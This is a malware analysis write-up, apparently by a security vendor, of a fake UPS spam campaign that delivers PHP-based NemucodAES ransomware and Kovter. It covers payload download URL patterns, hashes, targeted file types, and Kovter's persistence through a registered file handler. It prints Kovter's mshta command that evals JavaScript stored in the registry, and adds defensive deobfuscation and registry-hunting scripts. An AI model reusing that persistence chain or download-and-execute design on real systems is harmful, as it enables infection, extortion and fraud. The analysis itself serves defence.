Spammed JScript Phones Home To Download NemucodAES And Kovter

Contributed by: Gerald Carsula, Rodel Mendez and Nicholas Ramos

Last June, we reported that Kovter was being spammed together with Cerber ransomware using a fake email delivery notification. Over the last few weeks, another wave of fake UPS delivery notification spam has emerged, but instead of Kovter leading the attack, the main payload was a PHP-based ransomware.

Infection Vector

The initial email spam is purportedly about a failed delivery of an item or a parcel. It asks the user to review the details of the delivery through the attached ZIP file which holds a malicious JS file.


Figure 1: Email Sample - Fake UPS Delivery Notification


Figure 2: Email Sample - Fake UPS Delivery Notification

A curious victim can be enticed to extract and execute the (*.JS) file from the attached ZIP archive. On execution, the malicious JavaScript builds a set of URLs from the different hostnames held in one of its array variables.


Figure 3: Email Attachment - JS file

Once connected to one of the URLs, an obfuscated JS file will be downloaded. A sample JS file is shown below and consists of several hardcoded strings. To de-obfuscate it, we replaced these strings with the character "a" and concatenated the result with the rest of the variables.


Figure 4: Obfuscated downloaded JS file

Once properly de-obfuscated, the JS file immediately creates a dummy Word document filled with random characters. It then opens the document, which serves as a decoy to trick the user into believing that a Word document was opened rather than a JS file executed.



Figure 5: De-obfuscated downloaded JS file - Word Document Dummy Creation

Then, the downloaded JS file builds another distinct set of URLs from a separate set of domains/hostnames and URIs. Note that the variable "n" is crucial in determining which file will be downloaded. The table below shows each URL and the file that it downloads.


Figure 6: De-obfuscated downloaded JS file - Downloading the Payloads

var n: 3
URL: http://{array[item]}/counter/?{hardcoded}0fals3
Filepath: %TEMP%/1D2PpPKZcJURTNwSHSFwLCU9Rtm8qb4tk8.exe
Description: PHP Executable
MD5: 7A962AFC3D437A5046C3ADE4ED6E2696
SHA-1: 521FD3420A3939CFD10B181A41D6334728F41CD1

var n: 4
URL: http://{array[item]}/counter/?{hardcoded}0fals4
Filepath: %TEMP%/php5.dll
Description: PHP DLL
MD5: 91660C94F9F3283785FEBCB51CADBA4C
SHA-1: 242200D2AF9CDFABEDC8BD382F575AD9CFABDBFD

var n: 2
URL: http://{array[item]}/counter/?{hardcoded}0fals2
Filepath: %TEMP%/1D2PpPKZcJURTNwSHSFwLCU9Rtm8qb4tk82.exe
Description: Kovter Malware
MD5: ED3421FF73709830C46B31188FE0D73E
SHA-1: 8E53AB396DBC806765FDD52EE01C3D6C9DDEAA62

Next, if both the PHP executable and the PHP DLL have been downloaded, or already exist on the system, the downloaded JS file creates an obfuscated PHP script in the %TEMP% folder.


Figure 7: De-obfuscated downloaded JS file - Creating the PHP Script

Then, using the PHP executable, the JS file executes the newly created PHP script with the following arguments: Bitcoin Address, Bitcoin Price, and the Public Key.


Figure 8: De-obfuscated downloaded JS file - Executing the PHP Script

The flowchart below shows the full infection flow from the e-mail up to the payloads.

Figure 9: Flowchart - Infection Vector

Main Payload – PHP Ransomware

Since the PHP script is obfuscated, a simple string replacement followed by gzinflate has to be performed. There are free online tools that can perform gzinflate. Once properly de-obfuscated, the script recursively searches for files with specific extension names, starting from the root of the C:\ drive up to the root of the Z:\ drive.

Figure 10: PHP Script - Drive Enumeration and Recursive File Searching

It then searches for files with the following file extensions:

lnk|123|602|dif|docb|docm|dot|dotm|dotx|hwp|mml|odg|odp|ods|otg|otp|ots|ott|pot

potm|potx|ppam|ppsm|ppsx|pptm|sldm|sldx|slk|stc|std|sti|stw|sxc|sxd|sxm|sxw|txt

uop|uot|wb2|wk1|wks|xlc|xlm|xlsb|xlsm|xlt|xltm|xltx|xlw|xml|asp|bat|brd|c|cmd

dch|dip|jar|js|rb|sch|sh|vbs|3g2|fla|m4u|swf|bmp|cgm|djv|gif|nef|png|db|dbf|frm

ibd|ldf|myd|myi|onenotec2|sqlite3|sqlitedb|paq|tbk|tgz|3dm|asc|lay|lay6|ms11

ms11|crt|csr|key|p12|pem|qcow2|vmx|aes|zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip

arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps

sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php

pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv

tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb

slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf

wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi

vmdk|vhd|dsk|img|iso

It also avoids folders whose names start with the following strings:

winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming

msoffice|temporary|cache


Figure 11: PHP Script - Searching for Files to Encrypt

All the files that match the criteria above are listed in a buffer, which is encrypted after the ransom note has been set up. The ransom note needs to be inflated using the same gzinflate method.


Figure 12: PHP Script - Inflate - Ransomnote

Once inflated, some HTA code will be revealed, giving details of the bitcoin payments.


Figure 13: PHP Script - HTA - Ransomnote
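The string replacement and gzinflate steps used for both the PHP script and the ransom note can be done statically, without running any PHP. The following is an added example, not code from the original analysis; it assumes the layers are wrapped as gzinflate(base64_decode('...')) with a filler token spliced into the blob, and the token, function names and sample are constructed for illustration.

```python
import base64
import re
import zlib

JUNK = "@@k7@@"  # hypothetical filler token; real samples use their own strings
WRAPPER = re.compile(
    r"gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])([^'\"]+)\1", re.I)


def php_gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE, as PHP's gzdeflate() emits (used only to build the sample)."""
    c = zlib.compressobj(wbits=-15)
    return c.compress(data) + c.flush()


def php_gzinflate(data: bytes, limit: int = 1 << 20) -> bytes:
    """Equivalent of PHP gzinflate(): raw DEFLATE, no zlib or gzip header."""
    d = zlib.decompressobj(wbits=-15)
    out = d.decompress(data, limit)
    if not d.eof:  # stream truncated, or output larger than the cap
        raise ValueError("incomplete stream or inflated size over limit")
    return out


def unwrap(script: str, junk: str, max_layers: int = 10):
    """Peel gzinflate(base64_decode('...')) layers without running any PHP."""
    layers = 0
    while layers < max_layers:
        m = WRAPPER.search(script)
        if not m:
            break
        blob = m.group(2).replace(junk, "")  # the string-replacement step
        raw = base64.b64decode(blob, validate=True)
        script = php_gzinflate(raw).decode("utf-8", "replace")
        layers += 1
    return script, layers


def constructed_layer(code: str, junk: str) -> str:
    """Build one layer of the constructed sample (harmless inner code)."""
    b64 = base64.b64encode(php_gzdeflate(code.encode())).decode()
    return f"<?php eval(gzinflate(base64_decode('{b64[:8]}{junk}{b64[8:]}'))); ?>"


INNER = '<?php echo "constructed inner layer"; ?>'
SAMPLE = constructed_layer(constructed_layer(INNER, JUNK), JUNK)  # two layers

if __name__ == "__main__":
    print(unwrap(SAMPLE, JUNK))
```

The size cap in php_gzinflate keeps a hostile blob from exhausting memory on the analysis host, and strict base64 validation makes a missed replacement step fail loudly instead of producing garbage.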

This PHP ransomware uses AES encryption. It encrypts the first 100000 bytes of a file using a randomly generated key that is 128 characters long. Every file has its own unique key. The filename, the encryption key and the 100000 encrypted bytes of each file are saved in a single "database" file.


Figure 14: PHP Script - File Encryption

Lastly, the PHP script hashes details of the computer name, username and OS version, and sends the result to a CnC server together with other information, such as the public key and statistics on how many files were searched and encrypted.


Figure 15: PHP Script - Sends out Information


Figure 16: Network Traffic - Information sent out

The flow chart below gives a full overview of the PHP Ransomware behavior:


Figure 17: Flowchart - PHP Ransomware

Possible Secondary Payload: KOVTER Malware - IOC

Kovter is a secondary payload, and the actors behind this campaign chose to disable the download and execution of this file. The Kovter executable, however, was still alive on the web host at the time of analysis, so we took a quick look at its behavior. Once executed, it drops a couple of files in %LocalAppData%.


Figure 18: Kovter - Dropped File

These consist of a batch file and an encrypted JavaScript file. The batch file loads the encrypted JavaScript.

start "T8OVa8EVZT2kXEVqShD6l" "%LOCALAPPDATA%\b6bee4f9\d2f4b4bf.f80c91052"

Here is the content of the encrypted JavaScript file.


Figure 19: Kovter - JavaScript

The encrypted JavaScript's file extension, .f80c91052, was actually registered by the malware in the infected machine's Windows registry as a valid file extension.


Figure 20: Kovter - Registered File Extension

This file extension points to a6005236, a handler that points to yet another registry key that contains the JavaScript decryption and loading of the main malware:

HKEY_CLASSES_ROOT\a6005236\shell\open\command


Figure 21: Kovter - Spawn Shell

This registry shell entry executes a JavaScript that loads another obfuscated JavaScript stored in the registry key HKCU\\software\\mecyuvs\\rrattu.

Content of the registry key:

"C:\Windows\system32\mshta.exe" "javascript:Sqq8J="kYTJpUP";

s0Y=new ActiveXObject("WScript.Shell");Fm5baD="dxEb";

QF2xm=s0Y.RegRead("HKCU\\software\\mecyuvs\\rrattu");ine7HS9="V";

eval(QF2xm);iDxKR9="2TyRLeos";"

The registry key HKCU\\software\\mecyuvs\\rrattu holds another obfuscated JavaScript, which loads an obfuscated PowerShell script.


Figure 22: Kovter - PowerShell Script on Registry
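The chain described above (a registered extension, a handler, and a shell\open\command that has mshta.exe evaluate script read from the registry) can be hunted for in exported file-association data. The following is an added example, not code from the original analysis; the snapshot format, function name and scoring threshold are assumptions, and the sample reuses the extension, handler and command quoted in this article next to a benign control.

```python
import re

# Constructed snapshot of file-association keys (key path -> default value).
# The first pair reuses values quoted in the article; .txt is a benign control.
SNAPSHOT = {
    r"HKCR\.f80c91052": "a6005236",
    r"HKCR\a6005236\shell\open\command": (
        r'"C:\Windows\system32\mshta.exe" "javascript:Sqq8J="kYTJpUP";'
        r's0Y=new ActiveXObject("WScript.Shell");Fm5baD="dxEb";'
        r'QF2xm=s0Y.RegRead("HKCU\\software\\mecyuvs\\rrattu");ine7HS9="V";'
        r'eval(QF2xm);iDxKR9="2TyRLeos";"'
    ),
    r"HKCR\.txt": "txtfile",
    r"HKCR\txtfile\shell\open\command": r"%SystemRoot%\system32\NOTEPAD.EXE %1",
}

# Traits of a handler that runs script kept outside any file on disk.
INDICATORS = {
    "script host": re.compile(r"\b(mshta|wscript|cscript)(\.exe)?\b", re.I),
    "inline script URL": re.compile(r"\b(javascript|vbscript):", re.I),
    "code read from registry": re.compile(r"\.RegRead\s*\(", re.I),
    "dynamic eval": re.compile(r"\beval\s*\(", re.I),
}
REG_SOURCE = re.compile(r'RegRead\s*\(\s*"([^"]+)"', re.I)


def scripted_handlers(snapshot, min_hits=3):
    """Follow extension -> handler -> shell\\open\\command and score the command."""
    keys = {k.lower(): v for k, v in snapshot.items()}  # registry paths ignore case
    findings = []
    for key, handler in keys.items():
        ext = re.fullmatch(r"hkcr\\(\.[^\\]+)", key)
        if not ext:
            continue
        cmd_key = "\\".join(["hkcr", handler.lower(), "shell", "open", "command"])
        command = keys.get(cmd_key, "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if len(hits) >= min_hits:
            src = REG_SOURCE.search(command)
            findings.append({
                "extension": ext.group(1),
                "handler": handler,
                "indicators": hits,
                # JS source escapes backslashes; undo that for the real key path
                "payload_key": src.group(1).replace("\\\\", "\\") if src else None,
            })
    return findings


if __name__ == "__main__":
    print(scripted_handlers(SNAPSHOT))
```

The payload_key field tells the responder which registry value holds the next stage, so it can be collected before the association is removed.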

This PowerShell will spawn a regsvr32.exe process where the Kovter module is injected.


Figure 23: Kovter - PowerShell Spawn regsvr32.exe

Once Kovter is running in the injected process, it starts the behavior it is infamous for: click-fraud traffic.


Figure 23: Kovter - Click-fraud traffic

Conclusions

This spam campaign has proven that old tactics are still effective and reliable but also need to be varied from time to time, which is exactly what the threat actors behind it have been doing. The campaign used the same old fake notification with an archived JS file. It uses almost the same algorithm for creating multiple sets of URLs, which allows it to download the malicious payload. What did vary this time is the type of payload that was downloaded and executed. Although not new, the attack used PHP-based ransomware instead of the common binary ones. The PHP script will not work properly without downloading the non-malicious PHP interpreter binaries, but this is something not everyone would expect, given that it is somewhat hidden beneath all the obfuscation and inflating methods.

Also, it is critical to highlight that PHP script-based ransomware could be dangerous for web servers. Attackers can look for vulnerable upload scripts on these web servers and leverage them to upload the ransomware onto the server. Thus, this kind of attack is a threat not only to the client side but potentially also to the server side of the Internet infrastructure.

Lastly, this campaign also shows us that the Kovter malware is lurking in the background, waiting to be triggered by a simple update to the JS file.

The Trustwave Secure Email Gateway can recognize and block this threat campaign.
